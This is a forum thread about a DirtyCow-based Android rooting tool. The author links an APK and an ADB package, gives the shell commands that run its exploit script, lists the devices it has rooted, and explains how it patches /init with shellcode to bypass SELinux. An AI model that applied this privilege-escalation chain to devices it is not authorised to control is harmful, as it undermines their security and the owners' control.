FORUMS
Remove All Ads from XDA

Root tool DirtyCow Apk && adb

109 posts
Thanks Meter: 117
 
By kryz, Senior Member on 24th December 2016, 02:21 PM
Post Reply Email Thread
Hi,
I have developed a tool to exploit the dirtycow vulnerability and get TEMPORAL ROOT
It bypass the selinux in lollipop 32bits system only, we are working now in a 64bits and Marshmallow version and will be soon, have a lot of work to do it universal.
Im bringing 2 tools, one apk (no computer required) and one rar for adb and linux.
With this tool we will access to those partitions and start the attack there, but in the actual state if you have locked your bootloader a good choice is to have root even temporal one.

·APK
Required: SDCARD
The apk exploits this vuln in the vold context so, is necessary to have a sdcard and mount or extract it, when the app requires, one time per session.
This tool has some utilities for flash boot and system partition, also for backup and 2 methods of root:
·Attack init process (lollipop 32 bits only)
·Attack app_process.(all devices, not really good)

·Get root
Uninstall any supersu manager before root.
The way to use this app is first click in check perms(optional) and you will see if you have permissions to /init file.
If you have permisisons and lollipop 32 you can use the first method to get root.
Also in check permissions you will see if you have rights to backup/flash boot and system partition.
The process takes until 2 minutes to finish so wait please and watch the log window.
# ISSUES #
If you get reboot after get root you can:
-Clean init (restore init process sometimes crash the device, but is safe)
-Install selinux permissive (Set permanent the new selinux policy, not tested)
The first option is safe you just can get a reboot.
The second option is just tested in 3 devices(oppo,xperia,Moto E), so test it with a recovery system working, can break some selinux rule..


·ADB
The adb rar contains some utilities to get root via run-as and init and is only working in Lollipop 32bits.
To execute it:

-Pass rar:"nox"
-Extract the rar in /data/local/tmp/


Code:
chmod 755 /data/local/tmp/exploit.sh
cd /data/local/tmp/
./exploit.sh
This process take some time 1-2 minutes but you will see the progress in the console, please wait,
After will ask to turn off bluetooth do even sometimes is not required, it can accelerate the process.
It will ask to install selinux permissive, if you don't have reboot problems, don't install it, otherwise be sure you have a recovery system working and a stock rom ready to flash, this feature is stable but need more testing.
if all is ok you will see this:

Code:
#Type run-as -s1 to get a shell"
#Type run-as -s2 to execute su daemon"
The run-as -s1 give you a shell with init context but some restrictions because selinux autotransfer domain to run-as
The run-as -s2 will execute su dameon and a su init context with no restrictions.
# ISSUES #
If you get reboot after get root you can:
·mount system partition with flag abort:
Code:
mount -o remount,abort /system
You won't able to mount system in write mode.


This app is in BETA BETA state for now, just 7/9 devices passed not bad at all
I'll add more devices in the list soon

List of rooted devices:
Moto G 5.1 lollipop
Xperia 5.1 lollipop
Oppo 5.1 lollipop
Emulator 5.1 lollipop
XT1528 (MOTO E Verizon prepaid) 5.0.2 lollipop(reboot issues)
Asus Zenfone Go ZB452KG Lollipop(5.1.1)
Smartfren Andromax A / Haier a16c3h (Lollipop 5.1 Firmware 12.2)


Version:0.4
Adb:http://www.mediafire.com/file/r3i900...XPLOIT_ADB.rar
Apk:http://www.mediafire.com/file/38tysc...owt%282%29.apk
Implemented selinux pemissive after reboot.(adb,apk)
Enforce mode working.(adb,apk)

Version: 0.3
Fixed bug creating bl instruction.

Version: 0.2
-Fix bug in apk for some devices

Version: 0.1
-More compatible adb with lollipop 32 bits
-Fixed bug in the shellcode.
-64 bits version of run-as-dirtycow.

Todo:
-Working in Marshmallow 32 bits.
-Apk some fix.

Thanks to n0x for his great help debugging the shellcode issue in Moto G
The Following 43 Users Say Thank You to kryz For This Useful Post: [ View ] Gift kryz Ad-Free
 
 
24th December 2016, 04:17 PM |#2  
Senior Member
Thanks Meter: 25
 
More
Great work!

Waiting for 64 bit
24th December 2016, 05:53 PM |#3  
Member
Thanks Meter: 128
 
Donate to Me
More
I will gladly test with my v10 I've been able to get a temp root shell with dcow. Happy holidays!
24th December 2016, 06:04 PM |#4  
nemopsp's Avatar
Senior Member
Flag Tampa, FL
Thanks Meter: 111
 
More
Sweet ! Has anyone tested on Note 4? N910A on 5.1.1

I'm currently on 6.0.1 MM so I'm waiting for that release.

Anyone know if this will work with the November Security patch of 2016?

Sent from my SAMSUNG-SM-N910A using Tapatalk
24th December 2016, 06:50 PM |#5  
Member
Flag Georgetown
Thanks Meter: 0
 
More
Really cool. I am having a problem trying to connect my device over adb wifi and now this!!! I have a locked head unit and i can't install any apps (all installations blocked and developer mode, usb debug all hidden. ) any way for me to install this onto my phone and attack my device via bluetooth or something? Or autorun once connected to usb? It's a long shot but hey its Christmas!!

Merry Christmas by the way
25th December 2016, 11:25 AM |#6  
Member
Thanks Meter: 15
 
More
Can we have access to the run-as-dirtycow source code?

Thanks.
25th December 2016, 03:39 PM |#7  
OP Senior Member
Thanks Meter: 117
 
More
Exploit process
For the developers that are testing this exploit or want to know how it works deeply:

First we dirtycow some privileged process, for example run-as has suid 0 given by selinux capabilities not by the bit setuid.

When we have overwritten run-as, this binary can read /init path, so we copy to other place with our run-as "trojan".

In our run-as we need to put some code to read files, my run-as-dirtycow does:

run-as /init

Will print this file to the stdout(console), if we redirect this output to a file:

run-as /init > /data/local/tmp/init.dmp

We copy /init file through our dirtycowed run-as that has root privileges, and is permitted by Selinux.

We patch init.dmp to create our init.patch with a shellcode to load new policy.

We will use run-as to dirtycow again our init.dmp but patched with a shellcode.

So our run-as trojan also will have the dirtycow exploit and when we exec this binary with the right arguments also will dirtycow any file with read permissions to root.

run-as /init /data/local/tmp/init.patch

Once finish and when the new policy is loaded exec run-as trojan wiht the special parameter -s1 or -s2 give to you a shell root or install su in the device TEMPORAL, no modifies any partition but mount a ext4 partition in /system/xbin with the su binary.

Well this is the process to do it in adb shell, in the apk i am using fsck_msdos to do all this chain of steps.

I like to get some different init from lollipop 32 bits and Marshmallow 32bits to adjust the patcher to Marshmallow.
25th December 2016, 03:45 PM |#8  
OP Senior Member
Thanks Meter: 117
 
More
Quote:
Originally Posted by jucaroba

Can we have access to the run-as-dirtycow source code?

Thanks.

Is very simple just have the dirtycow exploit original and some code to copy files read and puts.

Anyways soon ill post here, has no many secrets lol, just copy file or execute sh, the main problem now is the patcher, to make it working in Marshamallow and 64bits, i don't have any device with 64bits, yes one xperiaZ that i can install a custom rom with Marshmallow.

But i think the first is to check if the patcher is working in lollipop32 bits well, even ive tested 2 devices and reversed some other inits is not enough to be completely sure that all is ok.
The Following 4 Users Say Thank You to kryz For This Useful Post: [ View ] Gift kryz Ad-Free
25th December 2016, 10:51 PM |#9  
Member
Thanks Meter: 15
 
More
Quote:
Originally Posted by kryz

Is very simple just have the dirtycow exploit original and some code to copy files read and puts.

Anyways soon ill post here, has no many secrets lol, just copy file or execute sh, the main problem now is the patcher, to make it working in Marshamallow and 64bits, i don't have any device with 64bits, yes one xperiaZ that i can install a custom rom with Marshmallow.

But i think the first is to check if the patcher is working in lollipop32 bits well, even ive tested 2 devices and reversed some other inits is not enough to be completely sure that all is ok.

Thanks for your answer.

I'm trying to use your exploit to be able to read my /data/misc/vold/expand_*.key file. My wife has a Moto G 2014 mobile with official (non rooted) Android 6 Marshmallow. The bootloader is locked. She has deleted accidentally all the pictures in her SD card, that is configured as adopted card (not portable). I have made a cloned copy of the SD in my linux laptop with dd command, but I can not mount the partitions in the SD because I have to know the encryption key.

I can not unlock the bootloader, because the phone will be reseted to factory and the encryption key will be deleted. And I can not read the key file without being root, because of the permissions of the file. I have tried your run-as-dirtycow trojan in the phone, and I can read files I have no permissions for, such as /init.rc. The only missing piece now is that I don't know the exact name of the key file. I only know that it is of the form "expand_*.key". Can your trojan run-as-dirtycow be modified to be able to read the files with this pattern name in a given directory?

Thanks in advance.
The Following User Says Thank You to jucaroba For This Useful Post: [ View ] Gift jucaroba Ad-Free
25th December 2016, 10:57 PM |#10  
Member
Thanks Meter: 16
 
More
Quote:
Originally Posted by kryz

Is very simple just have the dirtycow exploit original and some code to copy files read and puts.

Anyways soon ill post here, has no many secrets lol, just copy file or execute sh, the main problem now is the patcher, to make it working in Marshamallow and 64bits, i don't have any device with 64bits, yes one xperiaZ that i can install a custom rom with Marshmallow.

But i think the first is to check if the patcher is working in lollipop32 bits well, even ive tested 2 devices and reversed some other inits is not enough to be completely sure that all is ok.

I'm trying to root my boost max+ running 5.1.I tried the check perm option but couldn't remount sdcard,it just froze.Upon reboot it hang at starting apps.Had to remove sdcard to get phone to boot properly.

Sent from my N9521 using Tapatalk
25th December 2016, 11:10 PM |#11  
OP Senior Member
Thanks Meter: 117
 
More
Quote:
Originally Posted by tnomtlaw

I'm trying to root my boost max+ running 5.1.I tried the check perm option but couldn't remount sdcard,it just froze.Upon reboot it hang at starting apps.Had to remove sdcard to get phone to boot properly.

Sent from my N9521 using Tapatalk

When you mount the sdcard is normal that doesn't mount again, the process hijack fsck_msdos, you have to come back to the application, wait and watch the window log.

It depends on mount will get 1-5 seconds to see the information.

If you see that init is OK, you can proceed with the get root.

Perm logs
Post Reply Subscribe to Thread
Previous Thread Next Thread
Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes